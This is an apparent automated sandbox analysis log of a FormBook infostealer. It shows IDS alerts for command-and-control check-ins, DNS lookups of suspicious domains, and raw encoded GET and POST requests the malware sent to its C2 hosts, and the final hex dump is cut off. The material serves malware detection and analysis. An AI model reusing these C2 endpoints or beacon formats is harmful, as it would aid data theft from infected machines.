            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49715 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49716 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49717 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49719 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49721 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49723 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49725 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49727 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49729 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49731 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49733 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49735 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49737 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49739 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 154.12.34.252:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49741 -> 154.12.34.252:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49743 -> 154.12.34.252:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49745 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49747 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 5.252.229.221:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49749 -> 5.252.229.221:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49751 -> 5.252.229.221:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49752 -> 142.250.185.147:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49753 -> 142.250.185.147:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49755 -> 142.250.185.147:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49756 -> 185.181.104.242:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49757 -> 185.181.104.242:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49759 -> 185.181.104.242:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49760 -> 38.145.202.186:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49761 -> 38.145.202.186:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49763 -> 38.145.202.186:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49764 -> 94.130.217.114:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49765 -> 94.130.217.114:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49767 -> 94.130.217.114:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49768 -> 84.32.84.32:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49769 -> 84.32.84.32:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49771 -> 84.32.84.32:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.u9games.xyz
            Source: DNS query: www.globaltrend.xyz
            Source: DNS query: www.ffi07s.xyz
            Source: DNS query: www.j51a.xyz
            Source: DNS query: www.j51a.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: LHPL LHPL
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.u9games.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dtalengineering.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.alphacentura.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.xn72dkd7scx.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dynamologistics.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.globaltrend.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.ffi07s.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /y0md/?lv-=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XjftXonC7MPI4x3rx8vtk99+YtwuNug==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.j51a.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dospole.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.tp-consulting.netConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5VJRfawQqtKzEaQzvnU+DANXYfAkHXtawOjKvPvgjxfsrSG69BVdxcUkzQ==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.lexpaidshares.onlineConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.viertage.workConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.9988566a4.shopConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficDNS traffic detected: DNS query: www.u9games.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dtalengineering.com
            Source: global trafficDNS traffic detected: DNS query: www.alphacentura.com
            Source: global trafficDNS traffic detected: DNS query: www.xn72dkd7scx.shop
            Source: global trafficDNS traffic detected: DNS query: www.dynamologistics.net
            Source: global trafficDNS traffic detected: DNS query: www.globaltrend.xyz
            Source: global trafficDNS traffic detected: DNS query: www.ffi07s.xyz
            Source: global trafficDNS traffic detected: DNS query: www.j51a.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dospole.top
            Source: global trafficDNS traffic detected: DNS query: www.tp-consulting.net
            Source: global trafficDNS traffic detected: DNS query: www.lexpaidshares.online
            Source: global trafficDNS traffic detected: DNS query: www.viertage.work
            Source: global trafficDNS traffic detected: DNS query: www.9988566a4.shop
            Source: global trafficDNS traffic detected: DNS query: www.rightol.net
            Source: global trafficDNS traffic detected: DNS query: www.wegamovies.online
            Source: unknownHTTP traffic detected: POST /la5g/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateHost: www.dtalengineering.comContent-Length: 192Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Origin: http://www.dtalengineering.comReferer: http://www.dtalengineering.com/la5g/User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Data Raw: 6c 76 2d 3d 34 4e 6e 31 35 37 71 4b 6a 73 58 34 78 6b 39 2b 53 72 53 75 73 45 56 74 6f 42 54 31 6a 42 51 72 47 6a 38 45 51 59 53 66 56 67 33 61 67 79 76 6c 43 4f 70 63 69 31 77 78 45 72 74 56 61 77 55 6e 35 58 30 63 71 62 71 39 48 5a 78 77 2f 74 46 53 6f 59 74 49 73 43 67 64 4e 73 35 4f 66 49 2f 50 6c 2b 42 30 41 46 75 4e 79 33 72 5a 6e 64 6b 52 45 6b 42 48 32 55 51 49 59 78 78 74 38 53 2f 76 43 65 6a 6b 44 75 66 79 54 36 58 61 75 5a 69 41 73 67 70 75 57 70 50 31 6d 4b 68 36 41 30 6c 47 4f 34 58 74 4f 50 32 78 37 47 34 78 59 38 59 7a 70 51 30 62 7a 5a 39 4b 70 42 53 4f Data Ascii: lv-=4Nn157qKjsX4xk9+SrSusEVtoBT1jBQrGj8EQYSfVg3agyvlCOpci1wxErtVawUn5X0cqbq9HZxw/tFSoYtIsCgdNs5OfI/Pl+B0AFuNy3rZndkREkBH2UQIYxxt8S/vCejkDufyT6XauZiAsgpuWpP1mKh6A0lGO4XtOP2x7G4xY8YzpQ0bzZ9KpBSO
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:09:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzipData Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e 6e af ee 3f be ba 7a 7c fc 4f ef f7 1f 6f 8f bf be fd a7 4f 87 bb ff f8 df f7 77 8f af 9b a2 58 77 45 f1 6f bb ef fe 9b e5 e5 5e 5f 5c ac 1e 0e c7 b7 17 8f 4f bf 1e 0f 8f 37 87 c3 93 95 78 f8 cb 8b e2 3f ac fe 39 b0 5b b1 bc bb ff 65 f3 78 fb d7 db bb 0f af f1 fb c3 f5 e1 61 83 af fe 14 f1 cd c7 fb bf da 37 a7 0f fa 7a 78 f7 97 db a7 cd d3 fe d3 e6 e6 f6 c3 cd 11 ff 9e 50 b2 c7 fb 87 d7 ab a7 07 e4 f5 d3 fe 01 35 e6 61 ff 25 04 7f 77 7f fd eb 24 1f 1f f7 0f 1f 6e ef 5e af 8a 91 fa d3 fe fa 3a e4 6b f2 dd cd c1 42 bf 5e 95 38 ed f1 c8 8d f8 0f bf 3c 59 46 0f 9b fd f5 ff fe fc 38 3b ce 59 b7 ef 91 4d 28 e5 30 a1 fe 74 ff 08 c9 dc 83 1c c5 b6 7f ba fd 72 18 23 df 7f 39 3c bc 3f de 7f 7d bd ba b9 bd be 3e dc 8d 88 89 23 48 0e 99 a9 9a e2 d3 a4 cc e2 b9 ac f6 9f 9f ee c7 24 3c a1 cd d3 fd a7 d7 ab 76 96 44 10 aa f1 e9 fe e3 4b e8 f1 f0 1e e7 54 3d 9b f2 c1 0b 66 04 79 c2 ef f6 57 7f f9 f0 60 ca db 7c 7d d8 7f 5a fd f3 ea 99 f3 5d 3d 7f f0 f6 ea 78 ff f9 7a f3 ee f8 19 e5 b5 9a 44 62 d5 fe cd bb e2 50 1c 86 3f bd 94 fc eb cd ed d3 0b 29 df bf 7f 1f 93 05 43 80 20 8a ee b9 1c 46 f0 c9 2a 79 0f 89 a1 c2 ae 20 aa c3 c3 58 c2 2a 79 2b 85 50 f8 10 8a 6a 86 a7 18 c8 36 9b 87 c3 87 cf c7 fd 03 58 cd 6f 1b f7 d6 eb d5 1f dd 49 7f 5c af be 7d 40 2b b2 5e 3d 42 bc 9b c7 c3 c3 6d 92 dd 8d eb 0c 21 3e d8 19 86 20 a6 bc d7 ab ba 05 e3 0a c6 3e 6c a4 d6 26 7c 35 cf 40 90 e9 e3 e1 e3 ed c7 c3 f5 ed e7 8f f3 18 a1 16 e7 31 aa de c2 ce 63 7c 0d 6e d8 dc dd 3f 7c dc 1f 15 c1 bf 7c bd 42 eb f0 c2 f1 ef ee 8f d7 e9 d1 68 47 d2 a3 1f 3f bf 5b d6 8c 7b 12 2d 82 eb 34 08 7f ac b8 79 59 5a 4b b5 b2 96 4a c5 b9 5a 4f 8b f3 6c 8d f2 64 0f 0f 0f f7 0f ab 9b 72 1d 12 6c fd 4f 13 b2 54 58 55 ed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 09 Jul 2024 10:09:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: gzipData Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e 6e af ee 3f be ba 7a 7c fc 4f ef f7 1f 6f 8f bf be fd a7 4f 87 bb ff f8 df f7 77 8f af 9b a2 58 77 45 f1 6f bb ef fe 9b e5 e5 5e 5f 5c ac 1e 0e c7 b7 17 8f 4f bf 1e 0f 8f 37 87 c3 93 95 78 f8 cb 8b e2 3f ac fe 39 b0 5b b1 bc bb ff 65 f3 78 fb d7 db bb 0f af f1 fb c3 f5 e1 61 83 af fe 14 f1 cd c7 fb bf da 37 a7 0f fa 7a 78 f7 97 db a7 cd d3 fe d3 e6 e6 f6 c3 cd 11 ff 9e 50 b2 c7 fb 87 d7 ab a7 07 e4 f5 d3 fe 01 35 e6 61 ff 25 04 7f 77 7f fd eb 24 1f 1f f7 0f 1f 6e ef 5e af 8a 91 fa d3 fe fa 3a e4 6b f2 dd cd c1 42 bf 5e 95 38 ed f1 c8 8d f8 0f bf 3c 59 46 0f 9b fd f5 ff fe fc 38 3b ce 59 b7 ef 91 4d 28 e5 30 a1 fe 74 ff 08 c9 dc 83 1c c5 b6 7f ba fd 72 18 23 df 7f 39 3c bc 3f de 7f 7d bd ba b9 bd be 3e dc 8d 88 89 23 48 0e 99 a9 9a e2 d3 a4 cc e2 b9 ac f6 9f 9f ee c7 24 3c a1 cd d3 fd a7 d7 ab 76 96 44 10 aa f1 e9 fe e3 4b e8 f1 f0 1e e7 54 3d 9b f2 c1 0b 66 04 79 c2 ef f6 57 7f f9 f0 60 ca db 7c 7d d8 7f 5a fd f3 ea 99 f3 5d 3d 7f f0 f6 ea 78 ff 